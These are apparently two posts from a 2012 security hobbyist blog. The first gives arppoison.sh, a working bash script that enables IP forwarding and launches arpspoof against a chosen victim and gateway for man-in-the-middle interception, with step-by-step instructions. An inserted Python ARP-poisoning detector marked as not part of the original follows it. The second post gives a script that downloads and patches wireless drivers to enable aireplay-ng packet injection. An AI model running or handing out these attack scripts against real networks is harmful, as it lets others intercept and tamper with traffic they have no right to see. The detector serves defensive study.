Tuesday, March 27, 2012

arppoison.sh - A script to simplify ARP Poisoning for MITM attacks

   Last night I found this script, which I coded years ago, 2007 to be exact. I love it when I find old stuff like this so I thought I would share it here. The script is called arppoison.sh and, as the name suggests, it is used to ARP poison two targets using arpspoof. Since it uses arpspoof you need to have it installed. If you are using BackTrack 5 it should already be installed. If you are using Ubuntu you can easily install it using apt-get to download the dsniff suite like so:

sudo apt-get install dsniff
This script is really simple to use:
  1. Copy the text below into a text editor like nano or gedit.
  2. Save it as arppoison.sh.
  3. Make it executable with the following command: chmod +x arppoison.sh
  4. Run it with the following command: sudo ./arppoison.sh
  5. Enter the victim IP.
  6. Enter the gateway IP (i.e. the router).
  7. Sit back as it enables IP forwarding and launches another shell running arpspoof.

   While this script is simple it is useful, as it speeds up launching these attacks by handling the IP forwarding configuration and launching the attack in a separate shell, saving you from having to start another one and elevate it to root. Pretty much just launch it and keep working. The code for the script is below the screenshot. Don't forget to change the niccard variable to whatever your adapter is called (in my case wlan0). Hope this helps and feel free to let me know if you have any questions.





==================================================================

#!/bin/bash
# Interface arpspoof will send from; change this to match your adapter
niccard=wlan0

# Writing to /proc/sys and running arpspoof both require root
if [[ $EUID -ne 0 ]]; then
    echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
    echo -e "\t\t\t Example: sudo $0 \n"
    exit 1
else
    echo -e "\n\033[1;32m#######################################"
    echo -e "# ARP Poison Script #"
    echo -e "#######################################"
    echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
    echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
    echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
    echo -n "Please enter target's IP: "
    read victimIP
    echo -n "Please enter Gateway's IP: "
    read gatewayIP
    echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
    echo -e "\t\t--==[Targets]==--"
    echo -e "\t\tTarget: $victimIP"
    echo -e "\t\tGateway: $gatewayIP \n\n"
    # Enable IP forwarding so the target's traffic is relayed on to the gateway
    echo -e "[*] Enabling IP Forwarding \n"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    # Launch arpspoof in its own xterm so this shell stays free
    echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
    xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

==================================================================
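As an added detection-side example (not part of the original post), the following Python checker parses tcpdump-style ARP reply lines and flags the two things the attack above leaves on the wire: the gateway IP suddenly answering from a different MAC, and one MAC claiming several IPs. The sample lines, the `SAMPLE_LINES`, `parse_tcpdump_arp` and `detect_arp_conflicts` names, and the addresses are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style lines (shape of `tcpdump -n arp` output); not a real capture.
SAMPLE_LINES = [
    "10:00:00.000001 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28",
    "10:00:01.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28",
    "10:00:02.000001 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:01, length 28",
    "10:00:03.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28",
    "10:00:04.000001 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28",
    "10:00:05.000001 ARP, Reply 192.168.1.20 is-at de:ad:be:ef:00:01, length 28",
]

ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)

def parse_tcpdump_arp(lines):
    """Return (timestamp, ip, mac) for each ARP reply; requests and other lines are skipped."""
    out = []
    for line in lines:
        m = ARP_REPLY_RE.match(line)
        if m:
            out.append((m["ts"], m["ip"], m["mac"].lower()))
    return out

def detect_arp_conflicts(replies, trusted=None):
    """Flag replies that look like poisoning.

    trusted: optional static {ip: mac} table (e.g. the known gateway MAC). Without an
    entry, the first MAC seen for an IP is the baseline. A MAC answering for more than
    one IP is also reported, since poisoning both ends of a conversation does exactly that.
    """
    expected = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        baseline = expected.setdefault(ip, mac)
        if mac != baseline:
            alerts.append({"time": ts, "reason": "ip-mac-conflict", "ip": ip,
                           "expected": baseline, "got": mac})
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            alerts.append({"time": ts, "reason": "mac-claims-multiple-ips", "mac": mac,
                           "ips": sorted(ips_per_mac[mac])})
    return alerts
```

Feeding it a live `tcpdump -n -l arp` stream, with the gateway's real MAC in `trusted`, turns it into a minimal ARP-watch for the segment.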

Wednesday, January 18, 2012

Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included

I had recently upgraded my Ubuntu install to 11.10. Along with other annoyances I came across, I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:

mon0 is on channel -1, but the AP uses channel [#]


This was going to be a huge problem since I knew that my ZyDAS 1211 chipset was compatible with packet injection. After searching around for a bit I found a great solution from this site here about the drivers and how to patch and reinstall the older ones. Below I have a script that you can run to get that installed.

Driver Patcher in action.

==================================================================


#!/bin/bash
#
# This fix was found at:
# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html
#
# If this script helps you be sure to drop him a line and
# say thanks!
echo -e "\n\033[1;32m###########################################"
echo -e "# Ubuntu Patched Drivers Installer Script #"
echo -e "# Tested on Ubuntu 11.04 and 11.10 #"
echo -e "###########################################"
echo " Coded By: Travis Phillips"
echo " Date: 01/18/2012"
echo " Website: http://theunl33t.blogspot.com"
# Compiler and make are needed to build the driver tree
echo -e -n "\n[*] Installing build-essential...\033[0m"
sudo apt-get -y install build-essential &> /dev/null
echo -e "\033[1;32mDone!"
# Fetch the older compat-wireless release that the patches apply to
echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Extracting...\033[0m"
tar -jxf compat-wireless-2011-06-16.tar.bz2
# Stop here if the extract failed; the remaining steps assume this directory
cd compat-wireless-2011-06-16 || exit 1
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Patches...\033[0m"
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
# The first patch adds fragmentation/ack injection support; the second fixes the channel -1 bug
echo -e -n "\n[*] Applying Patches...\033[0m"
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
patch ./net/wireless/chan.c channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e "\n[*] Building patched drivers and installing."
echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."
echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"
make &> /dev/null
echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"
sudo make install &> /dev/null
echo -e "\033[1;32m[*] Installing Patched drivers completed!"
echo -e -n "\n[*] Cleaning Up...\033[0m"
cd ..
rm compat-wireless-2011-06-16.tar.bz2
rm -rf compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"



==================================================================

To run it, save it to a file called patchwifidrivers.sh and in a terminal type

chmod +x patchwifidrivers.sh
./patchwifidrivers.sh


Hope this helps some people.